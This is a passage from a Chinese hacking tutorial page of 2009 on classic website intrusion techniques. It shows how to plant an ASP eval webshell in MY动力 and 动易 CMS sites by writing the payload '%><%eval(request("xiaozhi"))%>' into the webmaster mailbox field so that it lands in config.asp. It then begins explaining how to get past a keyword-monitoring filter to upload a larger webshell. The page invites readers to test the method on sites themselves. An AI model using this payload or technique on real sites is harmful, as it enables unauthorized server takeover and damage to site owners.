WEB开发网
开发学院网络安全黑客技术 几个用过的经典入侵技巧整理 阅读

几个用过的经典入侵技巧整理

 2009-06-15 16:54:51 来源:WEB开发网   
核心提示: 图5图6图片看不清楚?请点击这里查看原图(大图),怎么样?SHELL拿到了吧,几个用过的经典入侵技巧整理(6),这里有一点要注意,虽然SHELL是拿到了但是这个时候网站也挂掉了,请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:98424b88afb8,我们需要进到SHELL里

图5

几个用过的经典入侵技巧整理

图6

几个用过的经典入侵技巧整理

图片看不清楚?请点击这里查看原图(大图)。

怎么样?SHELL拿到了吧,这里有一点要注意,虽然SHELL是拿到了但是这个时候网站也挂掉了,我们需要进到SHELL里找到config.asp文件,把里面的 "小新恭喜" 去掉,就OK啦。

其实不光是MY动力管理系统,动易文章系统以前也存在这个问题:在站长信箱那里写入"%><%eval(request("xiaozhi"))%><%’ 然后直接连接

inc目录下的config.asp就可以了。因为很多网站信息都是写入在config.asp里的,有空各位朋友可以自己去测试一下(编辑:如果读者朋友懂ASP可以自己研究一些ASP程序是否在后台配置文件用到FSO,这样基本上就是把配置信息写到了ASP文件里了)。

三、突破一流信息监控系统实现文件“上传”

相信很多朋友可能遇到过这样一个问题:在得到一个小马以后传大马的时候服务器却提示错误:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:98424b88afb8,如图7。

图7

上一页  1 2 3 4 5 6 7  下一页

Tags:经典 入侵 技巧

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接